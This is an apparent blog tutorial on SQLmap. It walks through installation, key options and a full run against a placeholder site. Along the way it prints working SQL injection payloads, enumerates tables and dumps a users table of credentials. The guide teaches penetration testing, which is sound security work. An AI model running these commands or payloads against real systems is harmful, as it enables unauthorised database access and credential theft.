Web Application Penetration Testing (WAPT): SQLmap
Hello everyone! Today, I will share my knowledge about SQLmap, an open-source penetration testing tool designed to detect and exploit SQL injection vulnerabilities in web applications. This tool is an essential addition to your toolbox. ππ
If you do not know anything about SQL injection attacks? Please read this article before going ahead.
The tool described below is intended solely for educational purposes and ethical penetration testing. It should never be used for malicious activities or unauthorized access.
How to Use SQLmap
Setup
Before diving into the usage of SQLmap, you need to install it. To do that, you can simply clone the GIT repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-devSQLMap Setup
It works with Python version 2.6, 2.7 and 3.x on any platform (including Windows, Linux, and MacOS).
Ensure that everything works:
python3 sqlmap.pyTesting SQLmap
___
__H__
___ ___[(]_____ ___ ___ {1.8.6.9#dev}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
Usage: python3 sqlmap.py [options]
sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --shell, --update, --purge, --list-tampers or --dependencies). Use -h for basic and -hh for advanced helpGood Output
If your output is different, please make sure that Python is installed and working properly by running python -V (remember SQLmap works only with 2.6, 2.7 and 3.x). Also, check that you are in the correct directory.
Usage
Once installed, you can start using SQLmap to test web applications for SQL injection vulnerabilities. Hereβs a basic example:
python3 sqlmap.py -u "http://target-website.com/vulnerable-page.php?id=1"
Basic Usage
There are a lot of different options available, you can find the entire list in this way:
python3 sqlmap.py -hhSQLmap Advanced Help Message
These are my favorite options:
-u URL, --url=URL: specifies the URL of the HTTP request (e.g., http://www.site.com/vuln.php?id=1);--method=METHOD: forces the usage of an HTTP method (e.g., POST);-r REQUESTFILE: loads the HTTP request from a file (alternative to-u);--data=DATA: body of the HTTP request (e.g., "id=1");--cookie=COOKIE: HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..");--headers=HEADERS: Additional HTTP headers (e.g. "Accept-Language: fr\nETag: 123");--proxy=PROXY: useful in case you need to intercept the requests sent by SQLmap (e.g., http://127.0.0.1:8080);--dbms=DBMS: restricts the malicious payloads to a specific DBMS (e.g., MySQL);--level=LEVEL: Level of tests to perform (e.g., 1-5, default 1);--risk=RISK: Risk of tests to perform (1-3, default 1);-a, --all: retrieves everything from the DBMS (i.e., all databases, all tables, all columns, etc..);-b, --banner: retrieves the DBMS banner;--current-user: retrieves the DBMS current user;--current-db: retrieves the DBMS current database;--dbs: enumerates all DBMS databases;--tables: enumerates all DBMS database tables;--columns: enumerate all DBMS database table columns;-D DB: enumerates a specific DBMS database (e.g., -D database_name);-T TBL DBMS: extracts a table (e.g., -T users);-C COL DBMS: extracts a column (e.g., -C password);
Example of Usage
First of all, you need a vulnerable SQL injection endpoint. You can find it manually or through SQLmap. As an example, please consider the following command:
python3 sqlmap.py -u "https://target-website.com/filter?id=1"Finding a SQL Injection Entry Point
___
__H__
___ ___[(]_____ ___ ___ {1.8.6.9#dev}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:18:41 /2024-06-24/
[...]
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 42 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3764=3764 AND 'jMuR'='jMuR
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT NULL,(CHR(113)||CHR(107)||CHR(112)||CHR(122)||CHR(113))||(CHR(82)||CHR(98)||CHR(117)||CHR(78)||CHR(89)||CHR(79)||CHR(118)||CHR(118)||CHR(119)||CHR(121)||CHR(97)||CHR(114)||CHR(88)||CHR(85)||CHR(117)||CHR(81)||CHR(122)||CHR(69)||CHR(117)||CHR(69)||CHR(112)||CHR(90)||CHR(106)||CHR(99)||CHR(97)||CHR(119)||CHR(108)||CHR(122)||CHR(74)||CHR(82)||CHR(106)||CHR(122)||CHR(120)||CHR(85)||CHR(74)||CHR(78)||CHR(97)||CHR(105)||CHR(65)||CHR(67))||(CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113))-- dudY
---
[11:21:13] [INFO] testing PostgreSQL
[11:21:14] [INFO] confirming PostgreSQL
[11:21:14] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[...]
[*] ending @ 11:21:32 /2024-06-24/
SQL Injection Entry Point Found
As shown above, SQLmap was able to identify a SQL injection entry point (i.e., the "id" parameter) and the backend DBMS (i.e., PostgreSQL). This is enough to generate a proof of concept. However, to accurately assess this vulnerability, we need to proceed further. Our next step is to attempt to extract the list of tables available in the current database:
python3 sqlmap.py --tables -u "https://target-website.com/filter?id=1"
Tables Enumeration
___
__H__
___ ___[(]_____ ___ ___ {1.8.6.9#dev}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:23:18 /2024-06-24/
[...]
[11:23:39] [INFO] fetching tables for database: 'db'
Database: db
[4 tables]
+--------------+
| users |
| products |
| reviews |
| coupon_codes |
+--------------+
[...]
[*] ending @ 11:23:39 /2024-06-24/
List of Tables
Users is usually the most interesting table, so we can try to dump it in the following way:
python3 sqlmap.py --dump -T users -u "https://vulnerable-website.com/filter?id=1"Dumping the "Users" Table
___
__H__
___ ___[(]_____ ___ ___ {1.8.6.9#dev}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:15:57 /2024-06-24/
[...]
[13:25:13] [INFO] fetching entries for table 'users' in database 'db'
Database: db
Table: users
[3 entries]
+------------------+-------------------+
| username | password |
+------------------+-------------------+
| admin | 4XAaQS0P5a3HASo |
| bob | dtgYu09lf8nimG1 |
| alice | SKeMA5vceEmZxWl |
+------------------+-------------------+
[...]
[*] ending @ 13:25:13 /2024-06-24/"Users" Table
Great job! We now have the admin credentials, giving us access to privileged functions. π
Some interesting resources:
I hope you found this guide on SQLmap informative and helpful. Whether you're a beginner or an experienced professional, your insights and experiences are valuable to us and the community. Have you already used sqlmap in your security assessments? What challenges have you faced, and what tips can you share? π€